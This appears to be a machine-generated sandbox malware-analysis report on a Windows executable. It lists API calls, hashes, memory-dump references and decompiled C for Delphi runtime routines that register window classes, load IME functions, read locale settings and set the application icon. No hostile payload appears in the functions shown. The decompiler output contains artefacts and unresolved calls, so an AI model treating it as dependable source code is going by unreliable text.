                                  0x00440f9f
                                  0x00440fa2
                                  0x00440faa
                                  0x00440fb7

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00440FB8), ref: 00440E61
                                  • GlobalAddAtomA.KERNEL32 ref: 00440E94
                                  • GetCurrentThreadId.KERNEL32 ref: 00440EAF
                                  • GlobalAddAtomA.KERNEL32 ref: 00440EE5
                                  • RegisterClipboardFormatA.USER32 ref: 00440EFB
                                    • Part of subcall function 00413F44: RtlInitializeCriticalSection.KERNEL32(00411A68,?,?,0041AE3D,00000000,0041AE61), ref: 00413F63
                                    • Part of subcall function 00440A48: SetErrorMode.KERNEL32(00008000), ref: 00440A61
                                    • Part of subcall function 00440A48: GetModuleHandleA.KERNEL32(USER32,00000000,00440BAE,?,00008000), ref: 00440A85
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440A92
                                    • Part of subcall function 00440A48: LoadLibraryA.KERNEL32(imm32.dll,00000000,00440BAE,?,00008000), ref: 00440AAE
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00440AD0
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440AE5
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440AFA
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00440B0F
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00440B24
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440B39
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440B4E
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440B63
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440B78
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440B8D
                                    • Part of subcall function 00440A48: SetErrorMode.KERNEL32(?,00440BB5,00008000), ref: 00440BA8
                                    • Part of subcall function 0045385C: GetKeyboardLayout.USER32(00000000), ref: 004538A1
                                    • Part of subcall function 0045385C: 72E7AC50.USER32(00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 004538F6
                                    • Part of subcall function 0045385C: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00453900
                                    • Part of subcall function 0045385C: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000), ref: 0045390B
                                    • Part of subcall function 00454A70: LoadIconA.USER32(00400000,MAINICON), ref: 00454B67
                                    • Part of subcall function 00454A70: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454B99
                                    • Part of subcall function 00454A70: OemToCharA.USER32(?,?), ref: 00454BAC
                                    • Part of subcall function 00454A70: CharNextA.USER32(?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BEB
                                    • Part of subcall function 00454A70: CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BF1
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00440F7F
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440F90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DB$USER32
                                  • API String ID: 1368734802-524302110
                                  • Opcode ID: 409f8933a92a13d96003edcbbfcf2c944e75a6f4b82560a894be135fe1716861
                                  • Instruction ID: 6ebe88a16ec22b620701bafe8b5e2749bc902e52cad4eba81a9d15a62b54c17e
                                  • Opcode Fuzzy Hash: 409f8933a92a13d96003edcbbfcf2c944e75a6f4b82560a894be135fe1716861
                                  • Instruction Fuzzy Hash: 31417C70A043459FDB00FFA5DC8298E77B4AB58308F00447AF505EB7A2DB78A958CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00454DBC, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 132windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 41%
                                  			E00454DBC(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x454f5d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xac)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x454f64);
					return E0040411C( &_v48);
				}
				_t22 =  *0x46fcb0; // 0x470048
				if( *_t22 != 0) {
					goto L13;
				}
				 *(_t69 + 0x40) = E0041AB90(E004554C4, __eax);
				 *0x46f030 = L004065DC;
				_t26 =  *0x46f050; // 0x454a60
				_t27 =  *0x470664; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x470664; // 0x400000
					 *0x46f03c = _t62;
					_t88 = RegisterClassA(0x46f02c);
					if(_t88 == 0) {
						_t64 =  *0x46fa44; // 0x41b628
						E00405C70(_t64,  &_v48);
						E0040B830(_v48, 1);
						E00403B64();
					}
				}
				_t29 =  *0x46fb00; // 0x470904
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x46fb00; // 0x470904
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x470664; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x69746163
				_t39 = E004045DC( *_t7);
				_t40 =  *0x46f050; // 0x454a60, executed
				_t41 = E00406B1C(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x44c408
				E0040411C(_t9);
				 *((char*)(_t69 + 0xac)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x46fb78; // 0x470aa4
				if( *_t47 != 0) {
					_t55 = E00455BD0(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E00455BD0(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x46fb78; // 0x470aa4
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}



























                                  0x00454dc5
                                  0x00454dc8
                                  0x00454dcc
                                  0x00454dcd
                                  0x00454dd2
                                  0x00454dd5
                                  0x00454ddf
                                  0x00454f47
                                  0x00454f49
                                  0x00454f4c
                                  0x00454f4f
                                  0x00454f5c
                                  0x00454f5c
                                  0x00454de5
                                  0x00454ded
                                  0x00000000
                                  0x00000000
                                  0x00454dfe
                                  0x00454e06
                                  0x00454e0f
                                  0x00454e15
                                  0x00454e22
                                  0x00454e24
                                  0x00454e29
                                  0x00454e38
                                  0x00454e3b
                                  0x00454e40
                                  0x00454e45
                                  0x00454e54
                                  0x00454e59
                                  0x00454e59
                                  0x00454e3b
                                  0x00454e60
                                  0x00454e69
                                  0x00454e6b
                                  0x00454e6d
                                  0x00454e6d
                                  0x00454e73
                                  0x00454e7c
                                  0x00454e7e
                                  0x00454e80
                                  0x00454e80
                                  0x00454e83
                                  0x00454e84
                                  0x00454e86
                                  0x00454e88
                                  0x00454e8a
                                  0x00454e8c
                                  0x00454e91
                                  0x00454e92
                                  0x00454e94
                                  0x00454e9a
                                  0x00454ea6
                                  0x00454eab
                                  0x00454eb0
                                  0x00454eb3
                                  0x00454eb9
                                  0x00454ebe
                                  0x00454ec5
                                  0x00454ecb
                                  0x00454ecf
                                  0x00454ed4
                                  0x00454edc
                                  0x00454ee0
                                  0x00454eed
                                  0x00454ef1
                                  0x00454ef8
                                  0x00454f00
                                  0x00454f04
                                  0x00454f04
                                  0x00454f0b
                                  0x00454f14
                                  0x00454f1e
                                  0x00454f2b
                                  0x00454f30
                                  0x00454f38
                                  0x00454f42
                                  0x00454f42
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0041AB90: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041ABAE
                                  • GetClassInfoA.USER32 ref: 00454E1B
                                  • RegisterClassA.USER32 ref: 00454E33
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  • SetWindowLongA.USER32 ref: 00454ECF
                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00454EF1
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F04
                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F0F
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F1E
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F2B
                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F42
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID: `JE
                                  • API String ID: 2103932818-3149267106
                                  • Opcode ID: c1eec7b054f6d7cad75d526c14ca3573be36f61593e3f94e9ab55c6a18fc72b1
                                  • Instruction ID: 3a8ad66ef44f363518f0461433bb41cf8f6826140007d3639f4c147a495530e1
                                  • Opcode Fuzzy Hash: c1eec7b054f6d7cad75d526c14ca3573be36f61593e3f94e9ab55c6a18fc72b1
                                  • Instruction Fuzzy Hash: D6414271600200AFE711EB69DC92F6633A8AB45708F544476FD44EF2E3DAB9AC448B2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C77C, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 72%
                                  			E0040C77C(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40ca47);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194; // executed
				E0040C6B8(); // executed
				E0040B11C(__ebx, __edi, __esi);
				_t196 =  *0x470750;
				if( *0x470750 != 0) {
					E0040B2F4(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040B068(_t43, 0, 0x14,  &_v20);
				E00404170(0x470684, _v20);
				E0040B068(_t43, 0x40ca5c, 0x1b,  &_v24);
				 *0x470688 = E004081CC(0x40ca5c, 0, _t196);
				E0040B068(_t132, 0x40ca5c, 0x1c,  &_v28);
				 *0x470689 = E004081CC(0x40ca5c, 0, _t196);
				 *0x47068a = E0040B0B4(_t132, 0x2c, 0xf);
				 *0x47068b = E0040B0B4(_t132, 0x2e, 0xe);
				E0040B068(_t132, 0x40ca5c, 0x19,  &_v32);
				 *0x47068c = E004081CC(0x40ca5c, 0, _t196);
				 *0x47068d = E0040B0B4(_t132, 0x2f, 0x1d);
				E0040B068(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040B3A4(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404170(0x470690, _v36);
				E0040B068(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040B3A4(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404170(0x470694, _v44);
				 *0x470698 = E0040B0B4(_t132, 0x3a, 0x1e);
				E0040B068(_t132, 0x40ca90, 0x28,  &_v52);
				E00404170(0x47069c, _v52);
				E0040B068(_t132, 0x40ca9c, 0x29,  &_v56);
				E00404170(0x4706a0, _v56);
				E0040411C( &_v12);
				E0040411C( &_v16);
				E0040B068(_t132, 0x40ca5c, 0x25,  &_v60);
				_t104 = E004081CC(0x40ca5c, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004041B4( &_v8, 0x40cab4);
				} else {
					E004041B4( &_v8, 0x40caa8);
				}
				E0040B068(_t132, 0x40ca5c, 0x23,  &_v64);
				_t111 = E004081CC(0x40ca5c, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040B068(_t132, 0x40ca5c, 0x1005,  &_v68);
					if(E004081CC(0x40ca5c, 0, _t198) != 0) {
						E004041B4( &_v12, 0x40cad0);
					} else {
						E004041B4( &_v16, 0x40cac0);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E0040449C();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E0040449C();
				 *0x470752 = E0040B0B4(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040CA4E);
				return E00404140( &_v68, 0x10);
			}

























                                  0x0040c77c
                                  0x0040c77c
                                  0x0040c77d
                                  0x0040c77f
                                  0x0040c784
                                  0x0040c784
                                  0x0040c786
                                  0x0040c788
                                  0x0040c788
                                  0x0040c78b
                                  0x0040c78e
                                  0x0040c78f
                                  0x0040c794
                                  0x0040c797
                                  0x0040c79a
                                  0x0040c79f
                                  0x0040c7a4
                                  0x0040c7ab
                                  0x0040c7ad
                                  0x0040c7ad
                                  0x0040c7b7
                                  0x0040c7c6
                                  0x0040c7d3
                                  0x0040c7e8
                                  0x0040c7f7
                                  0x0040c80c
                                  0x0040c81b
                                  0x0040c82e
                                  0x0040c841
                                  0x0040c856
                                  0x0040c865
                                  0x0040c878
                                  0x0040c88d
                                  0x0040c898
                                  0x0040c8a5
                                  0x0040c8ba
                                  0x0040c8c5
                                  0x0040c8d2
                                  0x0040c8e5
                                  0x0040c8fa
                                  0x0040c907
                                  0x0040c91c
                                  0x0040c929
                                  0x0040c931
                                  0x0040c939
                                  0x0040c94e
                                  0x0040c958
                                  0x0040c95d
                                  0x0040c95f
                                  0x0040c978
                                  0x0040c961
                                  0x0040c969
                                  0x0040c969
                                  0x0040c98d
                                  0x0040c997
                                  0x0040c99c
                                  0x0040c99e
                                  0x0040c9b0
                                  0x0040c9c1
                                  0x0040c9da
                                  0x0040c9c3
                                  0x0040c9cb
                                  0x0040c9cb
                                  0x0040c9c1
                                  0x0040c9df
                                  0x0040c9e2
                                  0x0040c9e5
                                  0x0040c9ea
                                  0x0040c9f7
                                  0x0040c9fc
                                  0x0040c9ff
                                  0x0040ca02
                                  0x0040ca07
                                  0x0040ca14
                                  0x0040ca27
                                  0x0040ca2e
                                  0x0040ca31
                                  0x0040ca34
                                  0x0040ca46

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040CA47,?,?,00000000,00000000), ref: 0040C7B2
                                    • Part of subcall function 0040B068: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: 33a423ce797f2d066e1f4baeb73304eab48830832cda1650a0645c114d66c3f4
                                  • Instruction ID: 66b48b4b215fc79f4f3cfa8a1e5756cbddd746598f1a1f7541d3629a9f0497b9
                                  • Opcode Fuzzy Hash: 33a423ce797f2d066e1f4baeb73304eab48830832cda1650a0645c114d66c3f4
                                  • Instruction Fuzzy Hash: 14613870700208DBDB00EBA59892B9E76A6DB99304F50D53BB105BB3C6CB3DD9458BAC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043848C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 447 43848c-4384c3 449 4384c5-4384cc 447->449 450 438538-43855d GetClassInfoA 447->450 449->450 453 4384ce-4384d3 449->453 451 43855f-43856a 450->451 452 43856c-43856e 450->452 451->452 454 43859d-4385ba call 43865c 451->454 455 438570-438578 UnregisterClassA 452->455 456 43857d-438596 RegisterClassA 452->456 457 4384d5-4384d9 453->457 458 4384f8-438533 call 405c70 call 40b86c call 403b64 453->458 466 4385c1-4385d4 GetWindowLongA 454->466 467 4385bc call 40cafc 454->467 455->456 456->454 461 438598 call 40cafc 456->461 457->458 460 4384db-4384ea call 403524 457->460 458->450 460->458 474 4384ec-4384f6 call 43ba58 460->474 461->454 471 4385f7-438604 call 408ae4 466->471 472 4385d6-4385e6 GetWindowLongA 466->472 467->466 481 438606 call 43bd64 471->481 472->471 476 4385e8-4385f2 SetWindowLongA 472->476 474->450 476->471 482 43860b-438610 call 41d650 481->482 484 438615-438627 call 435de4 482->484 487 438634-43864c call 40411c 484->487 488 438629-43862f call 403594 484->488 488->487
                                  C-Code - Quality: 83%
                                  			E0043848C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr* _t95;
				intOrPtr _t106;
				intOrPtr _t110;
				void* _t111;
				intOrPtr _t114;
				void* _t117;

				_t111 = __edi;
				_push(__ebx);
				_v196 = 0;
				_t95 = __eax;
				_push(_t117);
				_push(0x43864d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t117 + 0xffffff40;
				 *((intOrPtr*)( *__eax + 0x9c))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t95 + 0x17c)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00431760 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00431760;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040CAFC();
						}
					}
					 *0x46ecf0 = _t95;
					_t97 =  *_t95; // executed
					 *((intOrPtr*)( *_t95 + 0xa0))();
					if( *(_t95 + 0x188) == 0) {
						E0040CAFC();
					}
					if((GetWindowLongA( *(_t95 + 0x188), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t95 + 0x188), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t95 + 0x188), 0xfffffff4,  *(_t95 + 0x188));
					}
					E00408AE4( *((intOrPtr*)(_t95 + 0x64)));
					 *((intOrPtr*)(_t95 + 0x64)) = 0;
					E0043BD64(_t95);
					E00435DE4(_t95, E0041D650( *((intOrPtr*)(_t95 + 0x68)), _t95, _t97), 0x30, 1);
					_t132 =  *((char*)(_t95 + 0x5c));
					if( *((char*)(_t95 + 0x5c)) != 0) {
						E00403594(_t95, _t132);
					}
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x438654);
					return E0040411C( &_v196);
				} else {
					_t114 =  *((intOrPtr*)(__eax + 4));
					if(_t114 == 0 || ( *(_t114 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t95 + 8));
						_v188 = 0xb;
						_t86 =  *0x46fc8c; // 0x41b638
						E00405C70(_t86,  &_v196);
						E0040B86C(_t95, _v196, 1, _t111, _t114, 0,  &_v192);
						E00403B64();
					} else {
						_t110 =  *0x4309d0; // 0x430a1c
						if(E00403524(_t114, _t110) == 0) {
							goto L6;
						}
						_v116 = E0043BA58(_t114);
					}
					goto L7;
				}
			}





















                                  0x0043848c
                                  0x00438495
                                  0x00438499
                                  0x0043849f
                                  0x004384a3
                                  0x004384a4
                                  0x004384a9
                                  0x004384ac
                                  0x004384b9
                                  0x004384c3
                                  0x00438538
                                  0x0043853b
                                  0x00438550
                                  0x00438558
                                  0x0043855a
                                  0x0043855d
                                  0x0043856e
                                  0x00438578
                                  0x00438578
                                  0x0043857d
                                  0x00438587
                                  0x00438596
                                  0x00438598
                                  0x00438598
                                  0x00438596
                                  0x0043859d
                                  0x004385ab
                                  0x004385ad
                                  0x004385ba
                                  0x004385bc
                                  0x004385bc
                                  0x004385d4
                                  0x004385f2
                                  0x004385f2
                                  0x004385fa
                                  0x00438601
                                  0x00438606
                                  0x0043861e
                                  0x00438623
                                  0x00438627
                                  0x0043862f
                                  0x0043862f
                                  0x00438636
                                  0x00438639
                                  0x0043863c
                                  0x0043864c
                                  0x004384ce
                                  0x004384ce
                                  0x004384d3
                                  0x004384f8
                                  0x004384fb
                                  0x00438501
                                  0x00438517
                                  0x0043851c
                                  0x0043852e
                                  0x00438533
                                  0x004384db
                                  0x004384dd
                                  0x004384ea
                                  0x00000000
                                  0x00000000
                                  0x004384f3
                                  0x004384f3
                                  0x00000000
                                  0x004384d3

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @
                                  • API String ID: 717780171-2766056989
                                  • Opcode ID: b766675594354c646490a99025414dbfb3f380695b59da9072bb786d9125c0a0
                                  • Instruction ID: b86fa9c51bb098178d78653320565981dfc9d6ab35a00ea9b9923dc88da2b723
                                  • Opcode Fuzzy Hash: b766675594354c646490a99025414dbfb3f380695b59da9072bb786d9125c0a0
                                  • Instruction Fuzzy Hash: 8A516170A003449BDB10EF69CC85B9EB7A8AF09308F4451BEF805EB296DB389D45CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00454A70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 91%
                                  			E00454A70(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t45;
				struct HINSTANCE__** _t57;
				struct HICON__* _t59;
				intOrPtr _t62;
				struct HINSTANCE__** _t64;
				void* _t71;
				char* _t73;
				CHAR* _t75;
				intOrPtr _t79;
				char* _t80;
				intOrPtr _t86;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				void* _t96;
				char _t98;
				void* _t110;
				void* _t111;

				_t98 = __edx;
				_t96 = __ecx;
				if(__edx != 0) {
					_t111 = _t111 + 0xfffffff0;
					_t41 = E004036BC(_t41, _t110);
				}
				_v5 = _t98;
				_t95 = _t41;
				E00419AE4(_t96, 0);
				_t44 =  *0x46fbc0; // 0x46e3c0
				if( *((short*)(_t44 + 2)) == 0) {
					_t94 =  *0x46fbc0; // 0x46e3c0
					 *((intOrPtr*)(_t94 + 4)) = _t95;
					 *_t94 = 0x456540;
				}
				_t45 =  *0x46fc6c; // 0x46e3c8
				if( *((short*)(_t45 + 2)) == 0) {
					_t93 =  *0x46fc6c; // 0x46e3c8
					 *((intOrPtr*)(_t93 + 4)) = _t95;
					 *_t93 = E0045674C;
				}
				 *((char*)(_t95 + 0x34)) = 0;
				 *((intOrPtr*)(_t95 + 0x90)) = E00403368(1);
				 *((intOrPtr*)(_t95 + 0x98)) = E00403368(1);
				 *((intOrPtr*)(_t95 + 0xb0)) = E00403368(1);
				 *((intOrPtr*)(_t95 + 0x60)) = 0;
				 *((intOrPtr*)(_t95 + 0x84)) = 0;
				 *((intOrPtr*)(_t95 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t95 + 0x78)) = 0x1f4;
				 *((char*)(_t95 + 0x7c)) = 1;
				 *((intOrPtr*)(_t95 + 0x80)) = 0;
				 *((intOrPtr*)(_t95 + 0x74)) = 0x9c4;
				 *((char*)(_t95 + 0x88)) = 0;
				 *((char*)(_t95 + 0xa5)) = 1;
				 *((char*)(_t95 + 0xbc)) = 1;
				_t109 = E00424398(1);
				 *((intOrPtr*)(_t95 + 0xa0)) = _t56;
				_t57 =  *0x46fae4; // 0x47002c
				_t59 = LoadIconA( *_t57, "MAINICON"); // executed
				E0042476C(_t109, _t59);
				_t21 = _t95 + 0xa0; // 0x736d
				_t62 =  *_t21;
				 *((intOrPtr*)(_t62 + 0x14)) = _t95;
				 *((intOrPtr*)(_t62 + 0x10)) = 0x456e68;
				_t64 =  *0x46fae4; // 0x47002c
				GetModuleFileNameA( *_t64,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t71 = E0040C5E8( &_v261, 0x5c);
				if(_t71 != 0) {
					_t28 = _t71 + 1; // 0x1
					E00408914( &_v261, _t28);
				}
				_t73 = E0040C61C( &_v261, 0x2e);
				if(_t73 != 0) {
					 *_t73 = 0;
				}
				_t75 = CharNextA( &_v261); // executed
				CharLowerA(_t75);
				_t32 = _t95 + 0x8c; // 0x44c408
				E0040438C(_t32, 0x100,  &_v261);
				_t79 = E0041AC4C(0x4560a0, _t95); // executed
				 *((intOrPtr*)(_t95 + 0xc8)) = _t79;
				_t80 =  *0x46f9c4; // 0x470034
				if( *_t80 == 0) {
					E00454DBC(_t95, _t95, 0x100); // executed
				}
				 *((char*)(_t95 + 0x59)) = 1;
				 *((char*)(_t95 + 0x5a)) = 1;
				 *((char*)(_t95 + 0x5b)) = 1;
				 *((char*)(_t95 + 0xa6)) = 1;
				 *((intOrPtr*)(_t95 + 0xa8)) = 0;
				E00457044(_t95, 0x100);
				E00457B94(_t95);
				_t86 = _t95;
				if(_v5 != 0) {
					E00403714(_t86);
					_pop( *[fs:0x0]);
				}
				return _t95;
			}



























                                  0x00454a70
                                  0x00454a70
                                  0x00454a7d
